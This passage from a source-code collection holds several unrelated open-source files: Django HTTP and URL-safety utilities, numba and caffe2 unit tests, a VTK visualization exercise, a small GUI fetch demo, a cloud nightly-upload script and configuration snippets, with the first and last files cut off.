remote). If the uri is a zip file, unzip it, find catalog.json inside it
and parse that.
Args:
uri (str): Either a URI to a STAC catalog JSON file or a URI to a zip
file containing a STAC catalog JSON file.
Raises:
FileNotFoundError: If catalog.json is not found inside the zip file.
Exception: If multiple catalog.json's are found inside the zip file.
Returns:
        List[dict]: A list of dicts with keys: "label_uri", "image_uris",
"label_bbox", "image_bbox", "bboxes_intersect", and "aoi_geometry".
Each dict corresponds to one label item and its associated image
assets in the STAC catalog.
"""
uri_path = Path(uri)
is_zip = uri_path.suffix.lower() == '.zip'
with TemporaryDirectory() as tmp_dir:
catalog_path = download_if_needed(uri, tmp_dir)
if not is_zip:
return parse_stac(catalog_path)
if unzip_dir is None:
raise ValueError(
f'uri ("{uri}") is a zip file, but no unzip_dir provided.')
zip_path = catalog_path
unzip(zip_path, target_dir=unzip_dir)
catalog_paths = list(Path(unzip_dir).glob('**/catalog.json'))
if len(catalog_paths) == 0:
raise FileNotFoundError(f'Unable to find "catalog.json" in {uri}.')
elif len(catalog_paths) > 1:
raise Exception(f'More than one "catalog.json" found in '
f'{uri}.')
catalog_path = str(catalog_paths[0])
return parse_stac(catalog_path)
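# Hedged usage sketch (URIs and paths are hypothetical): reading a zipped STAC
# catalog with the helper above and pulling the first label URI.
#
#   items = read_stac('s3://bucket/catalog.zip', unzip_dir='/tmp/stac')
#   label_uri = items[0]['label_uri']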
|
numba/roc/tests/hsapy/test_reduction.py | mawanda-jun/numba | 1,738 | 11194954 | from __future__ import print_function, absolute_import, division
import numpy as np
from numba import unittest_support as unittest
from numba import roc, intp
WAVESIZE = 64
@roc.jit(device=True)
def wave_reduce(val):
tid = roc.get_local_id(0)
laneid = tid % WAVESIZE
width = WAVESIZE // 2
while width:
if laneid < width:
val[laneid] += val[laneid + width]
val[laneid + width] = -1 # debug
roc.wavebarrier()
width = width // 2
# First thread has the result
roc.wavebarrier()
return val[0]
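# For WAVESIZE == 64 the loop above halves `width` through 32, 16, 8, 4, 2, 1,
# so each active lane adds its partner's value and the sum accumulates in
# val[0] after log2(64) = 6 steps (a standard tree reduction in one wavefront).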
@roc.jit
def kernel_warp_reduce(inp, out):
idx = roc.get_group_id(0)
val = inp[idx]
out[idx] = wave_reduce(val)
@roc.jit
def kernel_flat_reduce(inp, out):
out[0] = wave_reduce(inp)
class TestReduction(unittest.TestCase):
def template_wave_reduce_int(self, dtype):
numblk = 2
inp = np.arange(numblk * WAVESIZE, dtype=dtype).reshape(numblk, WAVESIZE)
inp_cpy = np.copy(inp)
out = np.zeros((numblk,))
kernel_warp_reduce[numblk, WAVESIZE](inp, out)
np.testing.assert_equal(out, inp_cpy.sum(axis=1))
def test_wave_reduce_intp(self):
self.template_wave_reduce_int(np.intp)
def test_wave_reduce_int32(self):
self.template_wave_reduce_int(np.int32)
def template_wave_reduce_real(self, dtype):
numblk = 2
inp = np.linspace(0, 1, numblk * WAVESIZE).astype(dtype)
inp = inp.reshape(numblk, WAVESIZE)
inp_cpy = np.copy(inp)
out = np.zeros((numblk,))
kernel_warp_reduce[numblk, WAVESIZE](inp, out)
np.testing.assert_allclose(out, inp_cpy.sum(axis=1))
def test_wave_reduce_float64(self):
self.template_wave_reduce_real(np.float64)
def test_wave_reduce_float32(self):
self.template_wave_reduce_real(np.float32)
def test_flat_reduce(self):
inp = np.arange(WAVESIZE) # destroyed in kernel
out = np.zeros((1,))
kernel_flat_reduce[1, WAVESIZE](inp, out)
np.testing.assert_allclose(out[0], np.arange(WAVESIZE).sum())
if __name__ == '__main__':
unittest.main()
|
caffe2/python/operator_test/normalize_op_test.py | KevinKecc/caffe2 | 585 | 11194965 | # Copyright (c) 2016-present, Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import numpy as np
from hypothesis import given
import hypothesis.strategies as st
from caffe2.python import core
import caffe2.python.hypothesis_test_util as hu
class TestNormalizeOp(hu.HypothesisTestCase):
@given(X=hu.tensor(min_dim=1,
max_dim=5,
elements=st.floats(min_value=0.5, max_value=1.0)),
**hu.gcs)
def test_normalize(self, X, gc, dc):
def ref_normalize(X, axis):
x_normed = X / (
np.sqrt((X**2).sum(axis=axis, keepdims=True)) + np.finfo(X.dtype).tiny)
return (x_normed,)
for axis in range(-X.ndim, X.ndim):
op = core.CreateOperator("Normalize", "X", "Y", axis=axis)
self.assertReferenceChecks(
gc,
op,
[X],
functools.partial(ref_normalize, axis=axis))
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(X=hu.tensor(min_dim=1,
max_dim=5,
elements=st.floats(min_value=0.5, max_value=1.0)),
**hu.gcs)
def test_normalize_L1(self, X, gc, dc):
def ref(X, axis):
norm = abs(X).sum(axis=axis, keepdims=True)
return (X / norm,)
for axis in range(-X.ndim, X.ndim):
print('axis: ', axis)
op = core.CreateOperator("NormalizeL1", "X", "Y", axis=axis)
self.assertReferenceChecks(
gc,
op,
[X],
functools.partial(ref, axis=axis))
self.assertDeviceChecks(dc, op, [X], [0])
|
django/utils/http.py | KaushikSathvara/django | 61,676 | 11194969 | <filename>django/utils/http.py
import base64
import datetime
import re
import unicodedata
from binascii import Error as BinasciiError
from email.utils import formatdate
from urllib.parse import (
ParseResult, SplitResult, _coerce_args, _splitnetloc, _splitparams,
scheme_chars, urlencode as original_urlencode, uses_params,
)
from django.utils.datastructures import MultiValueDict
from django.utils.regex_helper import _lazy_re_compile
# based on RFC 7232, Appendix C
ETAG_MATCH = _lazy_re_compile(r'''
\A( # start of string and capture group
(?:W/)? # optional weak indicator
" # opening quote
[^"]* # any sequence of non-quote characters
" # end quote
)\Z # end of string and capture group
''', re.X)
MONTHS = 'jan feb mar apr may jun jul aug sep oct nov dec'.split()
__D = r'(?P<day>\d{2})'
__D2 = r'(?P<day>[ \d]\d)'
__M = r'(?P<mon>\w{3})'
__Y = r'(?P<year>\d{4})'
__Y2 = r'(?P<year>\d{2})'
__T = r'(?P<hour>\d{2}):(?P<min>\d{2}):(?P<sec>\d{2})'
RFC1123_DATE = _lazy_re_compile(r'^\w{3}, %s %s %s %s GMT$' % (__D, __M, __Y, __T))
RFC850_DATE = _lazy_re_compile(r'^\w{6,9}, %s-%s-%s %s GMT$' % (__D, __M, __Y2, __T))
ASCTIME_DATE = _lazy_re_compile(r'^\w{3} %s %s %s %s$' % (__M, __D2, __T, __Y))
RFC3986_GENDELIMS = ":/?#[]@"
RFC3986_SUBDELIMS = "!$&'()*+,;="
def urlencode(query, doseq=False):
"""
A version of Python's urllib.parse.urlencode() function that can operate on
MultiValueDict and non-string values.
"""
if isinstance(query, MultiValueDict):
query = query.lists()
elif hasattr(query, 'items'):
query = query.items()
query_params = []
for key, value in query:
if value is None:
raise TypeError(
"Cannot encode None for key '%s' in a query string. Did you "
"mean to pass an empty string or omit the value?" % key
)
elif not doseq or isinstance(value, (str, bytes)):
query_val = value
else:
try:
itr = iter(value)
except TypeError:
query_val = value
else:
# Consume generators and iterators, when doseq=True, to
# work around https://bugs.python.org/issue31706.
query_val = []
for item in itr:
if item is None:
raise TypeError(
"Cannot encode None for key '%s' in a query "
"string. Did you mean to pass an empty string or "
"omit the value?" % key
)
elif not isinstance(item, bytes):
item = str(item)
query_val.append(item)
query_params.append((key, query_val))
return original_urlencode(query_params, doseq)
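# Illustrative examples (not part of the module itself) of the helper above:
#   urlencode({'a': 1, 'b': 'x y'})       -> 'a=1&b=x+y'
#   urlencode({'a': [1, 2]}, doseq=True)  -> 'a=1&a=2'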
def http_date(epoch_seconds=None):
"""
Format the time to match the RFC1123 date format as specified by HTTP
RFC7231 section 7.1.1.1.
`epoch_seconds` is a floating point number expressed in seconds since the
epoch, in UTC - such as that outputted by time.time(). If set to None, it
defaults to the current time.
Output a string in the format 'Wdy, DD Mon YYYY HH:MM:SS GMT'.
"""
return formatdate(epoch_seconds, usegmt=True)
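# Example with a fixed timestamp: http_date(0) returns
# 'Thu, 01 Jan 1970 00:00:00 GMT', matching the RFC1123 format noted above.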
def parse_http_date(date):
"""
Parse a date format as specified by HTTP RFC7231 section 7.1.1.1.
The three formats allowed by the RFC are accepted, even if only the first
one is still in widespread use.
Return an integer expressed in seconds since the epoch, in UTC.
"""
# email.utils.parsedate() does the job for RFC1123 dates; unfortunately
# RFC7231 makes it mandatory to support RFC850 dates too. So we roll
# our own RFC-compliant parsing.
for regex in RFC1123_DATE, RFC850_DATE, ASCTIME_DATE:
m = regex.match(date)
if m is not None:
break
else:
raise ValueError("%r is not in a valid HTTP date format" % date)
try:
tz = datetime.timezone.utc
year = int(m['year'])
if year < 100:
current_year = datetime.datetime.now(tz=tz).year
current_century = current_year - (current_year % 100)
if year - (current_year % 100) > 50:
                # years that appear to be more than 50 years in the future
                # are interpreted as representing the past.
year += current_century - 100
else:
year += current_century
month = MONTHS.index(m['mon'].lower()) + 1
day = int(m['day'])
hour = int(m['hour'])
min = int(m['min'])
sec = int(m['sec'])
result = datetime.datetime(year, month, day, hour, min, sec, tzinfo=tz)
return int(result.timestamp())
except Exception as exc:
raise ValueError("%r is not a valid date" % date) from exc
def parse_http_date_safe(date):
"""
Same as parse_http_date, but return None if the input is invalid.
"""
try:
return parse_http_date(date)
except Exception:
pass
# Base 36 functions: useful for generating compact URLs
def base36_to_int(s):
"""
Convert a base 36 string to an int. Raise ValueError if the input won't fit
into an int.
"""
# To prevent overconsumption of server resources, reject any
# base36 string that is longer than 13 base36 digits (13 digits
# is sufficient to base36-encode any 64-bit integer)
if len(s) > 13:
raise ValueError("Base36 input too large")
return int(s, 36)
def int_to_base36(i):
"""Convert an integer to a base36 string."""
char_set = '0123456789abcdefghijklmnopqrstuvwxyz'
if i < 0:
raise ValueError("Negative base36 conversion input.")
if i < 36:
return char_set[i]
b36 = ''
while i != 0:
i, n = divmod(i, 36)
b36 = char_set[n] + b36
return b36
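# Round-trip sketch for the base36 helpers above:
#   int_to_base36(125)   -> '3h'
#   base36_to_int('3h')  -> 125
#   base36_to_int('z' * 14) raises ValueError (more than 13 digits).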
def urlsafe_base64_encode(s):
"""
Encode a bytestring to a base64 string for use in URLs. Strip any trailing
equal signs.
"""
return base64.urlsafe_b64encode(s).rstrip(b'\n=').decode('ascii')
def urlsafe_base64_decode(s):
"""
Decode a base64 encoded string. Add back any trailing equal signs that
might have been stripped.
"""
s = s.encode()
try:
return base64.urlsafe_b64decode(s.ljust(len(s) + len(s) % 4, b'='))
except (LookupError, BinasciiError) as e:
raise ValueError(e)
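# Example round trip (value chosen for illustration):
#   urlsafe_base64_encode(b'django')   -> 'ZGphbmdv'
#   urlsafe_base64_decode('ZGphbmdv')  -> b'django'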
def parse_etags(etag_str):
"""
Parse a string of ETags given in an If-None-Match or If-Match header as
defined by RFC 7232. Return a list of quoted ETags, or ['*'] if all ETags
should be matched.
"""
if etag_str.strip() == '*':
return ['*']
else:
# Parse each ETag individually, and return any that are valid.
etag_matches = (ETAG_MATCH.match(etag.strip()) for etag in etag_str.split(','))
return [match[1] for match in etag_matches if match]
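# Illustrative inputs for the ETag helpers (values are hypothetical):
#   parse_etags('W/"abc", "def"')  -> ['W/"abc"', '"def"']
#   parse_etags('*')               -> ['*']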
def quote_etag(etag_str):
"""
If the provided string is already a quoted ETag, return it. Otherwise, wrap
the string in quotes, making it a strong ETag.
"""
if ETAG_MATCH.match(etag_str):
return etag_str
else:
return '"%s"' % etag_str
def is_same_domain(host, pattern):
"""
Return ``True`` if the host is either an exact match or a match
to the wildcard pattern.
Any pattern beginning with a period matches a domain and all of its
subdomains. (e.g. ``.example.com`` matches ``example.com`` and
``foo.example.com``). Anything else is an exact string match.
"""
if not pattern:
return False
pattern = pattern.lower()
return (
pattern[0] == '.' and (host.endswith(pattern) or host == pattern[1:]) or
pattern == host
)
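# Examples of the wildcard matching described above (hosts are hypothetical):
#   is_same_domain('foo.example.com', '.example.com')  -> True
#   is_same_domain('example.com', '.example.com')      -> True
#   is_same_domain('example.com', 'example.org')       -> False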
def url_has_allowed_host_and_scheme(url, allowed_hosts, require_https=False):
"""
Return ``True`` if the url uses an allowed host and a safe scheme.
Always return ``False`` on an empty url.
If ``require_https`` is ``True``, only 'https' will be considered a valid
scheme, as opposed to 'http' and 'https' with the default, ``False``.
Note: "True" doesn't entail that a URL is "safe". It may still be e.g.
quoted incorrectly. Ensure to also use django.utils.encoding.iri_to_uri()
on the path component of untrusted URLs.
"""
if url is not None:
url = url.strip()
if not url:
return False
if allowed_hosts is None:
allowed_hosts = set()
elif isinstance(allowed_hosts, str):
allowed_hosts = {allowed_hosts}
# Chrome treats \ completely as / in paths but it could be part of some
# basic auth credentials so we need to check both URLs.
return (
_url_has_allowed_host_and_scheme(url, allowed_hosts, require_https=require_https) and
_url_has_allowed_host_and_scheme(url.replace('\\', '/'), allowed_hosts, require_https=require_https)
)
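# Behaviour sketch (hosts are hypothetical):
#   url_has_allowed_host_and_scheme('/next/', allowed_hosts=None)          -> True
#   url_has_allowed_host_and_scheme('https://evil.com/', {'example.com'})  -> False
#   url_has_allowed_host_and_scheme('http://example.com/', {'example.com'},
#                                   require_https=True)                    -> False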
# Copied from urllib.parse.urlparse() but uses fixed urlsplit() function.
def _urlparse(url, scheme='', allow_fragments=True):
"""Parse a URL into 6 components:
<scheme>://<netloc>/<path>;<params>?<query>#<fragment>
Return a 6-tuple: (scheme, netloc, path, params, query, fragment).
Note that we don't break the components up in smaller bits
(e.g. netloc is a single string) and we don't expand % escapes."""
url, scheme, _coerce_result = _coerce_args(url, scheme)
splitresult = _urlsplit(url, scheme, allow_fragments)
scheme, netloc, url, query, fragment = splitresult
if scheme in uses_params and ';' in url:
url, params = _splitparams(url)
else:
params = ''
result = ParseResult(scheme, netloc, url, params, query, fragment)
return _coerce_result(result)
# Copied from urllib.parse.urlsplit() with
# https://github.com/python/cpython/pull/661 applied.
def _urlsplit(url, scheme='', allow_fragments=True):
"""Parse a URL into 5 components:
<scheme>://<netloc>/<path>?<query>#<fragment>
Return a 5-tuple: (scheme, netloc, path, query, fragment).
Note that we don't break the components up in smaller bits
(e.g. netloc is a single string) and we don't expand % escapes."""
url, scheme, _coerce_result = _coerce_args(url, scheme)
netloc = query = fragment = ''
i = url.find(':')
if i > 0:
for c in url[:i]:
if c not in scheme_chars:
break
else:
scheme, url = url[:i].lower(), url[i + 1:]
if url[:2] == '//':
netloc, url = _splitnetloc(url, 2)
if (('[' in netloc and ']' not in netloc) or
(']' in netloc and '[' not in netloc)):
raise ValueError("Invalid IPv6 URL")
if allow_fragments and '#' in url:
url, fragment = url.split('#', 1)
if '?' in url:
url, query = url.split('?', 1)
v = SplitResult(scheme, netloc, url, query, fragment)
return _coerce_result(v)
def _url_has_allowed_host_and_scheme(url, allowed_hosts, require_https=False):
# Chrome considers any URL with more than two slashes to be absolute, but
# urlparse is not so flexible. Treat any url with three slashes as unsafe.
if url.startswith('///'):
return False
try:
url_info = _urlparse(url)
except ValueError: # e.g. invalid IPv6 addresses
return False
# Forbid URLs like http:///example.com - with a scheme, but without a hostname.
    # In that URL, example.com is not the hostname but a path component. However,
# Chrome will still consider example.com to be the hostname, so we must not
# allow this syntax.
if not url_info.netloc and url_info.scheme:
return False
# Forbid URLs that start with control characters. Some browsers (like
# Chrome) ignore quite a few control characters at the start of a
# URL and might consider the URL as scheme relative.
if unicodedata.category(url[0])[0] == 'C':
return False
scheme = url_info.scheme
# Consider URLs without a scheme (e.g. //example.com/p) to be http.
if not url_info.scheme and url_info.netloc:
scheme = 'http'
valid_schemes = ['https'] if require_https else ['http', 'https']
return ((not url_info.netloc or url_info.netloc in allowed_hosts) and
(not scheme or scheme in valid_schemes))
def escape_leading_slashes(url):
"""
If redirecting to an absolute path (two leading slashes), a slash must be
escaped to prevent browsers from handling the path as schemaless and
redirecting to another host.
"""
if url.startswith('//'):
url = '/%2F{}'.format(url[2:])
return url
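# Example: escape_leading_slashes('//evil.com/path') -> '/%2Fevil.com/path',
# which keeps the redirect on the current host as described above.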
|
Filters/Programmable/Testing/Python/MultidimensionalSolution.py | forestGzh/VTK | 1,755 | 11194986 | <filename>Filters/Programmable/Testing/Python/MultidimensionalSolution.py
#!/usr/bin/env python
import vtk
from vtk.util.misc import vtkGetDataRoot
VTK_DATA_ROOT = vtkGetDataRoot()
#
# The dataset read by this exercise ("combVectors.vtk") has field data
# associated with the pointdata, namely two vector fields. In this exercise,
# you will convert both sets of field data into attribute data. Mappers only
# process attribute data, not field data. So we must convert the field data to
# attribute data in order to display it. (You'll need to determine the "names"
# of the two vector fields in the field data.)
#
# If there is time remaining, you might consider adding a programmable filter
# to convert the two sets of vectors into a single scalar field, representing
# the angle between the two vector fields.
#
# You will most likely use vtkFieldDataToAttributeDataFilter, vtkHedgeHog,
# and vtkProgrammableAttributeDataFilter.
#
# Create the RenderWindow, Renderer and interactor
#
ren1 = vtk.vtkRenderer()
renWin = vtk.vtkRenderWindow()
renWin.SetMultiSamples(0)
renWin.AddRenderer(ren1)
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
# create pipeline
#
# get the pressure gradient vector field
pl3d_gradient = vtk.vtkMultiBlockPLOT3DReader()
pl3d_gradient.SetXYZFileName("" + str(VTK_DATA_ROOT) + "/Data/combxyz.bin")
pl3d_gradient.SetQFileName("" + str(VTK_DATA_ROOT) + "/Data/combq.bin")
pl3d_gradient.SetScalarFunctionNumber(100)
pl3d_gradient.SetVectorFunctionNumber(210)
pl3d_gradient.Update()
pl3d_g_output = pl3d_gradient.GetOutput().GetBlock(0)
# get the velocity vector field
pl3d_velocity = vtk.vtkMultiBlockPLOT3DReader()
pl3d_velocity.SetXYZFileName("" + str(VTK_DATA_ROOT) + "/Data/combxyz.bin")
pl3d_velocity.SetQFileName("" + str(VTK_DATA_ROOT) + "/Data/combq.bin")
pl3d_velocity.SetScalarFunctionNumber(100)
pl3d_velocity.SetVectorFunctionNumber(200)
pl3d_velocity.Update()
pl3d_v_output = pl3d_velocity.GetOutput().GetBlock(0)
# contour the scalar fields
contour = vtk.vtkContourFilter()
contour.SetInputData(pl3d_g_output)
contour.SetValue(0,0.225)
# probe the vector fields to get data at the contour surface
probe_gradient = vtk.vtkProbeFilter()
probe_gradient.SetInputConnection(contour.GetOutputPort())
probe_gradient.SetSourceData(pl3d_g_output)
probe_velocity = vtk.vtkProbeFilter()
probe_velocity.SetInputConnection(contour.GetOutputPort())
probe_velocity.SetSourceData(pl3d_v_output)
#
# To display the vector fields, we use vtkHedgeHog to create lines.
#
velocity = vtk.vtkHedgeHog()
velocity.SetInputConnection(probe_velocity.GetOutputPort())
velocity.SetScaleFactor(0.0015)
pressureGradient = vtk.vtkHedgeHog()
pressureGradient.SetInputConnection(probe_gradient.GetOutputPort())
pressureGradient.SetScaleFactor(0.00002)
def ExecuteDot (__vtk__temp0=0,__vtk__temp1=0):
    # proc for ProgrammableAttributeDataFilter: compute the cosine of the
    # angle between the two probed vector fields, i.e. their dot product
    # normalized by the product of the vector lengths.
    inputs = dotProduct.GetInputList()
    input0 = inputs.GetDataSet(0)
    input1 = inputs.GetDataSet(1)
    numPts = input0.GetNumberOfPoints()
    vectors0 = input0.GetPointData().GetVectors()
    vectors1 = input1.GetPointData().GetVectors()
    scalars = vtk.vtkFloatArray()
    for i in range(numPts):
        v0x, v0y, v0z = vectors0.GetTuple3(i)
        v1x, v1y, v1z = vectors1.GetTuple3(i)
        # vector lengths
        l0 = (v0x * v0x + v0y * v0y + v0z * v0z) ** 0.5
        l1 = (v1x * v1x + v1y * v1y + v1z * v1z) ** 0.5
        if l0 > 0.0 and l1 > 0.0:
            d = (v0x * v1x + v0y * v1y + v0z * v1z) / (l0 * l1)
        else:
            d = 0.0
        scalars.InsertValue(i, d)
    dotProduct.GetOutput().GetPointData().SetScalars(scalars)
#
# We use the ProgrammableAttributeDataFilter to compute the cosine
# of the angle between the two vector fields (i.e. the dot product
# normalized by the product of the vector lengths).
#
#
dotProduct = vtk.vtkProgrammableAttributeDataFilter()
dotProduct.SetInputConnection(probe_velocity.GetOutputPort())
dotProduct.AddInput(probe_velocity.GetOutput())
dotProduct.AddInput(probe_gradient.GetOutput())
dotProduct.SetExecuteMethod(ExecuteDot)
#
# Create the mappers and actors. Note the call to GetPolyDataOutput when
# setting up the mapper for the ProgrammableAttributeDataFilter
#
velocityMapper = vtk.vtkPolyDataMapper()
velocityMapper.SetInputConnection(velocity.GetOutputPort())
velocityMapper.ScalarVisibilityOff()
velocityActor = vtk.vtkLODActor()
velocityActor.SetMapper(velocityMapper)
velocityActor.SetNumberOfCloudPoints(1000)
velocityActor.GetProperty().SetColor(1,0,0)
pressureGradientMapper = vtk.vtkPolyDataMapper()
pressureGradientMapper.SetInputConnection(pressureGradient.GetOutputPort())
pressureGradientMapper.ScalarVisibilityOff()
pressureGradientActor = vtk.vtkLODActor()
pressureGradientActor.SetMapper(pressureGradientMapper)
pressureGradientActor.SetNumberOfCloudPoints(1000)
pressureGradientActor.GetProperty().SetColor(0,1,0)
dotMapper = vtk.vtkPolyDataMapper()
dotMapper.SetInputConnection(dotProduct.GetOutputPort())
dotMapper.SetScalarRange(-1,1)
dotActor = vtk.vtkLODActor()
dotActor.SetMapper(dotMapper)
dotActor.SetNumberOfCloudPoints(1000)
#
# The PLOT3DReader is used to draw the outline of the original dataset.
#
pl3d = vtk.vtkMultiBlockPLOT3DReader()
pl3d.SetXYZFileName("" + str(VTK_DATA_ROOT) + "/Data/combxyz.bin")
pl3d.Update()
pl3d_output = pl3d.GetOutput().GetBlock(0)
outline = vtk.vtkStructuredGridOutlineFilter()
outline.SetInputData(pl3d_output)
outlineMapper = vtk.vtkPolyDataMapper()
outlineMapper.SetInputConnection(outline.GetOutputPort())
outlineActor = vtk.vtkActor()
outlineActor.SetMapper(outlineMapper)
outlineActor.GetProperty().SetColor(0,0,0)
#
# Add the actors to the renderer, set the background and size
#
ren1.AddActor(outlineActor)
ren1.AddActor(velocityActor)
ren1.AddActor(pressureGradientActor)
ren1.AddActor(dotActor)
ren1.SetBackground(1,1,1)
renWin.SetSize(500,500)
#ren1 SetBackground 0.1 0.2 0.4
cam1 = ren1.GetActiveCamera()
cam1.SetClippingRange(3.95297,50)
cam1.SetFocalPoint(9.71821,0.458166,29.3999)
cam1.SetPosition(-21.6807,-22.6387,35.9759)
cam1.SetViewUp(-0.0158865,0.293715,0.955761)
# render the image
#
renWin.Render()
renWin.SetWindowName("Multidimensional Visualization Exercise")
# prevent the tk window from showing up then start the event loop
# --- end of script --
|
mindsdb/integrations/mariadb_handler/mariadb_handler.py | mindsdb/main | 261 | 11194991 | from mindsdb.integrations.mysql_handler.mysql_handler import MySQLHandler
class MariaDBHandler(MySQLHandler):
"""
This handler handles connection and execution of the MariaDB statements.
"""
def __init__(self, name, **kwargs):
super().__init__(name, **kwargs) |
testFetch.py | icarito/guy | 194 | 11195005 | #!/usr/bin/env python3
# # -*- coding: utf-8 -*-
import guy
# call a http service during an async rpc method call
class Fetch(guy.Guy): # name the class as the web/<class_name>.html
size=guy.FULLSCREEN
__doc__="""
<style>
body,html,center {width:100%;height:100%;margin:0px;padding:0px;cursor:pointer;background:black}
img {
max-height: 100%;
width: auto;
}
div {position:fixed;top:10px;right:20px;z-index:2;color:red;font-size:100px;font-family:sans-serif}
</style>
<script>
var list=[];
guy.init( function() {
guy.fetch("https://www.reddit.com/r/pics/.rss") // not possible with classic window.fetch()
.then( x=>{return x.text()} )
.then( x=>{
list=x.match(/https:..i\.redd\.it\/[^\.]+\..../g)
change()
})
})
function change(n) {
document.querySelector("#i").src=list[0];
list.push( list.shift() )
}
</script>
<center>
<img id="i" src="" onclick="change()"/>
</center>
<div onclick="guy.exit()">X</div>
"""
if __name__=="__main__":
Fetch().run()
|
RecoBTag/SecondaryVertex/python/negativeCombinedSecondaryVertexV2Computer_cfi.py | ckamtsikis/cmssw | 852 | 11195009 | <filename>RecoBTag/SecondaryVertex/python/negativeCombinedSecondaryVertexV2Computer_cfi.py<gh_stars>100-1000
import FWCore.ParameterSet.Config as cms
from RecoBTag.SecondaryVertex.combinedSecondaryVertexV2Computer_cfi import *
negativeCombinedSecondaryVertexV2Computer = combinedSecondaryVertexV2Computer.clone(
vertexFlip = True,
trackFlip = True,
trackSelection = dict(sip3dSigMax = 0),
trackPseudoSelection = dict(sip3dSigMax = 0,
sip2dSigMin = -99999.9,
sip2dSigMax = -2.0)
)
|
upload.py | swils/verifast | 272 | 11195049 | <gh_stars>100-1000
import sys
import os
import json
from google.oauth2 import service_account
from google.cloud import storage
credentials = service_account.Credentials.from_service_account_info(json.loads(os.environ['GOOGLE_CLOUD_PLATFORM_CREDENTIALS']))
storageClient = storage.Client(credentials.project_id, credentials)
bucket = storageClient.bucket('verifast-nightlies')
vfversion = os.environ['VFVERSION']
OS = os.environ['VERIFAST_OS']
if OS == 'Windows_NT':
os_tag = 'windows'
local_prefix = 'src/'
suffix = '.zip'
elif OS == 'Darwin':
os_tag = 'macos'
local_prefix = 'upload/'
suffix = '-osx.tar.gz'
else:
local_prefix = 'upload/'
os_tag = 'linux'
suffix = '.tar.gz'
prefix = 'latest/' + os_tag + '/'
old_nightlies = list(storageClient.list_blobs(bucket, prefix=prefix))
local_filename = local_prefix + 'verifast-nightly' + suffix
object_filename = 'verifast-' + vfversion + suffix
new_nightly = bucket.blob(prefix + object_filename)
print('Uploading {} to {}...'.format(local_filename, new_nightly.name))
new_nightly.upload_from_filename(local_filename)
print('Uploaded {} to {}.'.format(local_filename, new_nightly.name))
html = """\
<html>
<head>
<meta http-equiv="refresh" content="0; URL={}" />
</head>
</html>
""".format(prefix + object_filename)
html_object_filename = 'verifast-nightly-{}-latest.html'.format(os_tag)
print('Updating {}...'.format(html_object_filename))
html_blob = bucket.blob(html_object_filename)
html_blob.cache_control = 'no-cache, max-age=0'
html_blob.upload_from_string(html, content_type='text/html')
print('Updated {}'.format(html_object_filename))
if old_nightlies:
print('Deleting old nightlies {}'.format(old_nightlies))
for old_nightly in old_nightlies:
if old_nightly.name != new_nightly.name:
old_nightly.delete()
print('Deleted {}'.format(old_nightly.name))
|
great_expectations/core/usage_statistics/anonymizers/data_docs_site_anonymizer.py | vanderGoes/great_expectations | 6,451 | 11195053 | from great_expectations.core.usage_statistics.anonymizers.anonymizer import Anonymizer
from great_expectations.core.usage_statistics.anonymizers.site_builder_anonymizer import (
SiteBuilderAnonymizer,
)
from great_expectations.core.usage_statistics.anonymizers.store_backend_anonymizer import (
StoreBackendAnonymizer,
)
class DataDocsSiteAnonymizer(Anonymizer):
def __init__(self, salt=None):
super().__init__(salt=salt)
self._site_builder_anonymizer = SiteBuilderAnonymizer(salt=salt)
self._store_backend_anonymizer = StoreBackendAnonymizer(salt=salt)
def anonymize_data_docs_site_info(self, site_name, site_config):
site_config_module_name = site_config.get("module_name")
if site_config_module_name is None:
site_config[
"module_name"
] = "great_expectations.render.renderer.site_builder"
anonymized_info_dict = (
self._site_builder_anonymizer.anonymize_site_builder_info(
site_builder_config=site_config,
)
)
anonymized_info_dict["anonymized_name"] = self.anonymize(site_name)
store_backend_config = site_config.get("store_backend")
anonymized_info_dict[
"anonymized_store_backend"
] = self._store_backend_anonymizer.anonymize_store_backend_info(
store_backend_object_config=store_backend_config
)
site_index_builder_config = site_config.get("site_index_builder")
anonymized_site_index_builder = (
self._site_builder_anonymizer.anonymize_site_builder_info(
site_builder_config=site_index_builder_config
)
)
# Note AJB-20201218 show_cta_footer was removed in v 0.9.9 via PR #1249
if "show_cta_footer" in site_index_builder_config:
anonymized_site_index_builder[
"show_cta_footer"
] = site_index_builder_config.get("show_cta_footer")
anonymized_info_dict[
"anonymized_site_index_builder"
] = anonymized_site_index_builder
return anonymized_info_dict
|
Lib/test/test_multiprocessing_forkserver.py | shawwn/cpython | 52,316 | 11195061 | import unittest
import test._test_multiprocessing
import sys
from test import support
if support.PGO:
raise unittest.SkipTest("test is not helpful for PGO")
if sys.platform == "win32":
raise unittest.SkipTest("forkserver is not available on Windows")
test._test_multiprocessing.install_tests_in_module_dict(globals(), 'forkserver')
if __name__ == '__main__':
unittest.main()
|
Geometry/HGCalGeometry/test/python/testHGCalWaferInFileTestV15_cfg.py | Purva-Chaudhari/cmssw | 852 | 11195063 | import FWCore.ParameterSet.Config as cms
from Configuration.Eras.Era_Phase2C11_cff import Phase2C11
process = cms.Process("PROD",Phase2C11)
process.load("SimGeneral.HepPDTESSource.pdt_cfi")
process.load("Geometry.HGCalCommonData.testHGCalV15XML_cfi")
process.load("Geometry.HGCalCommonData.hgcalV15ParametersInitialization_cfi")
process.load("Geometry.HGCalCommonData.hgcalNumberingInitialization_cfi")
process.load("Geometry.CaloEventSetup.HGCalV9Topology_cfi")
process.load("Geometry.HGCalGeometry.HGCalGeometryESProducer_cfi")
process.load("Geometry.HGCalGeometry.hgcalEEWaferInFileTest_cfi")
process.load('FWCore.MessageService.MessageLogger_cfi')
if hasattr(process,'MessageLogger'):
process.MessageLogger.HGCalGeom=dict()
process.load("IOMC.RandomEngine.IOMC_cff")
process.RandomNumberGeneratorService.generator.initialSeed = 456789
process.source = cms.Source("EmptySource")
process.generator = cms.EDProducer("FlatRandomEGunProducer",
PGunParameters = cms.PSet(
PartID = cms.vint32(14),
MinEta = cms.double(-3.5),
MaxEta = cms.double(3.5),
MinPhi = cms.double(-3.14159265359),
MaxPhi = cms.double(3.14159265359),
